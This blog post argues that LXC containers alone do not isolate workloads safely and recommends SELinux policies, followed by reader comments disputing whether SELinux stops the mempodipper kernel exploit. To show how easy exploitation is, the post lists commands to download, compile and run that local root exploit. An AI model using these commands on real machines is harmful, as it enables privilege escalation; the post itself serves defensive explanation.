Are LXC containers enough?

First off, let me state that I think the LXC project is great.  In previous blog posts, I’ve talked about segmenting existing virtual machines to securely run multiple workloads and achieve better flexibility, cost, etc.  This concept is often referred to as ‘Linux Containers’ and creating these containers with the LXC project is a very popular approach.  LXC  aggregates a collection of other technologies such as Linux Control Groups, Kernel Namespaces, Bind Mounts and others to accomplish this in an easy way.  Good stuff.  The question however, is whether LXC alone is enough to give you confidence in your approach to utilizing Linux containers.

In the words of Dan Berrange:

Repeat after me “LXC is not yet secure. [. . .]”

In other words, no it’s not enough.  The main problem right now is that LXC doesn’t have any inherent protection against exploits that allow a user to become root.  In the world of Linux, traditionally if you have root you can do anything.  When using containers, that means that if one container can find a way to become root on the machine, it can do whatever it wants with all the other containers on the box.  I think the official term for that situation in IT is a ‘cluster’.  While the concept of capabilities is being introduced into the kernel to help segment the abilities that root actually has, that is a long ways out from being a realistic defense, especially on the production systems in deployment today.

How realistic are these exploits, though?  To many, the concept of a kernel or security exploit is something they would rather believe just doesn’t actually happen.  Maybe they prefer to think that it’s limited to the realm of academic discussions.  Or maybe they just believe it’s not going to happen to them.

Unfortunately, the reality is quite different.  While I agree that finding an exploit requires an amazing amount knowledge and creativity, using an exploit for malicious purposes isn’t that challenging.  For example, let’s look at the excellent article written by Jason A. Donenfeld about a kernel exploit that is able to achieve root access.  Jason explains how this exploit works in amazing detail here – http://blog.zx2c4.com/749.  Believe me, discovering that and writing that article was a LOT of work.  But now, let’s look at how easy it is to use that exploit on unpatched kernels:

  • Download the provided C program (e.g. wget http://bit.ly/wELTpn)
  • Compile it (gcc mempodipper.c -o mempodipper)
  • Run it and get root access (./mempodipper)

Pretty scary huh?  Three steps and I could get root on your machine.  I can hear the sighs of relief already though, as people start thinking:

I don’t have to worry about this since I don’t let people run arbitrary code run on my machines…

Let’s discuss that train of thought for a minute.  First, let’s approach this from the perspective of a Platform as a Service (PaaS).  A PaaS essentially allows users to run their own code on machines shared by many.  That means experimenting with an exploit like this in a PaaS environment isn’t very difficult at all.  And remember, if any user can get root on that system, they own all the applications on it.

Not consuming or hosting a PaaS?  Well, I’ve spent many years in IT shops and the traditional IT deployments for large companies don’t look all too different.  Granted, the code is usually coming from employees and contractors, but you still probably don’t want to risk root exposures by anyone that is able to deploy a change into your environment.

Well if LXC doesn’t protect against this and my traditional environments are susceptible as well, is there any hope at all?!?!  Thankfully, there is.

The solution is using SELinux in combination with whatever container technologies you are using.  With an SELinux policy, you are essentially able to control the operations of any running process, regardless of what user they happen to be.  SELinux provides a layer of protection against the root layer where most other security mechanisms fail.  When a user is running in a SELinux context on a system and tries an exploit like the one above, you have an extra line of defense.  It’s easy for you to establish a confined environment that limits riskier operations like syscalls to setuid and restricts memory access which, in turn, would stop this exploit and others.  Most importantly, you can get consistent protection across any process, no matter what user they are running as.

You can think of SELinux as a whitelisting approach instead of blacklisting.  The traditional model of security (often referred to as Discretionary Access Control or DAC) requires protecting against anything a user should not be able to do.  Given the complexity of systems today, that’s becoming unrealistic for mere mortals.  The SELinux model of security (often referred to as Mandatory Access Control or MAC) requires enabling everything a user should be able to do.

While it’s not a silver bullet, it’s an elegant mitigation in many areas.  Many types of IT hosting are becoming increasingly standardized and you can put in place fairly simple policies that specify what users should be able to do.  For web applications, you are going to allow binding to HTTP / HTTPS ports.  You are going to probably allow JDBC connections.  You can describe the allowed behaviors of many of your applications in a fairly concise way.  Thinking of security this way mitigates many of the exploits that take a creative path like the one above (setuid access, /proc file descriptor access, and memory manipulation).  Unless you have a pretty special web application, it’s safe to say it shouldn’t be doing that stuff :)

Interested in learning more?  The place I recommend to start is with the Fedora documentation.  Fedora and RHEL have some of the best SELinux policies and support in the industry.  The documentation covers everything from learning SELinux to debugging it.  Most importantly though, don’t get fooled into thinking all Linux distributions are the same.  While SELinux support is in the kernel, what really matters is the ecosystem of policies that exist.  In Fedora or RHEL, you get whitelists ready-made for a slew of well known systems like Apache.  In many other distros, you’d spend your time having to recreate that work for the standard systems and never have any time to focus on your application policies.  Probably not your best use of time and would be a daunting first experience with SELinux to say the least.

My last disclaimer is that even as powerful as SELinux is, I wouldn’t recommend on putting all your eggs in one basket when it comes to security.  Combine SELinux with other security measures and maintain traditional operational best practices to minimize your exposure (e.g. apply security updates, audit, etc).  In other words, use it as an enhancement to what you do today, not a replacement.

Well, if you’ve made it this far, I’ll assume you are a convert: Welcome to the world of SELinux and sleeping a little better at night!

14 thoughts on “Are LXC containers enough?

  1. I like the premise of the article but I don’t like your use of the mempodipper exploit. That exploit is a kernel exploit. SELinux can not protect against kernel exploits as it exists at the kernel layer. If you had a user space exploit that gave you root privileges then the example would be on firmer ground. You can restrict paths of attack with SELinux policies which could prevent an attacker from exploiting a kernel vulnerability but that is a different situation. We can’t give people the impression that SELinux is going to protect them from kernel vulnerabilities because at best it can just restrict the attackers avenues of attack.

    • The reason I brought this up is because SELinux policies don’t protect against the behavior that mempodipper uses.

  2. David, I believe in this case it would prevent, since the attack requires the ability to run a setuid app which would be blocked by SELinux. Just because you have the ability to execute programs from the qemu process, selinux would prevent you from executing setuid apps, which would prevent this attack.

  3. I believe the policy for openshift instances would prevent this attack since it would block the ability to execute the setuid system call required to attack the machine. Even if you were able to jump over the authorization phase, the application would still be required to execute setuid sys call which SELinux would block.

    SELinux can not block all kernel vulnerabilities. If the confined application is allowed to communicate with the device, file or kernel file system that is used to attack the kernel then SELinux will not block the attack. In general security in layers is the best, a combination of DAC, SELinux, Namespaceing, Memory randomization etc. As well as keeping the machine up to date with security updates.

    Which makes using a system like OpenShift all the more interesting since the administrators of OpenShift are doing all the heavy lifting.

  4. I agree that you can use policy to lock down the attack vector and in the openshift case that may be the case. However when mempodipper was released we did nothing to stop it. I briefly spoke with Steve about it and it was a combination of how we deal with labeling of proc and policy. Its just important that we keep the message clear so we don’t have someone come along and dismiss our claims because an example was wrong (which unfortunately I’ve seen this happen else where with this exact exploit).

    • That being said though I like the content of the article and it was a really interesting read. I’m going to toss it up on the selinux google+ page as well.

      • Hey Dave, I appreciate the comments. I do agree that people shouldn’t view SELinux as a silver bullet – especially with kernel exploits. That said, I do spend much of my time with the ‘setenforce 0’ crew, so I wanted to try and capture some of the power of SELinux policies, even if those policies are just used to reduce user space exploit attack vectors. Glad you thought it was an interesting read – I’ll try and cover more details as we continue to experiment on OpenShift.

    • I of course would listen to Steve on this, but my quick read of the vulnerability was that you had to run a domain that was allowed to do setuid access in order to take advantage of the vulnerability, since an openshift instance is not allowed to execute setuid and not able to transition to any domains that can execute setuid like passwd_t, su_t or sudo_t, then this vulnerability would be blocked.

  5. Pingback: Accelerating IT Service Delivery for the Enterprise « all things open

  6. Pingback: The OpenShift Difference: Developer Experience, Automation and Choice - Blog Import Demo Site

  7. Pingback: OpenShift Week in Review - July 22, 2012 - Blog Import Demo Site

  8. Pingback: OpenShift Week in Review - July 22, 2012 - OpenShift Blog

  9. Pingback: The History of Containers | Red Hat Enterprise Linux Blog

Leave a Reply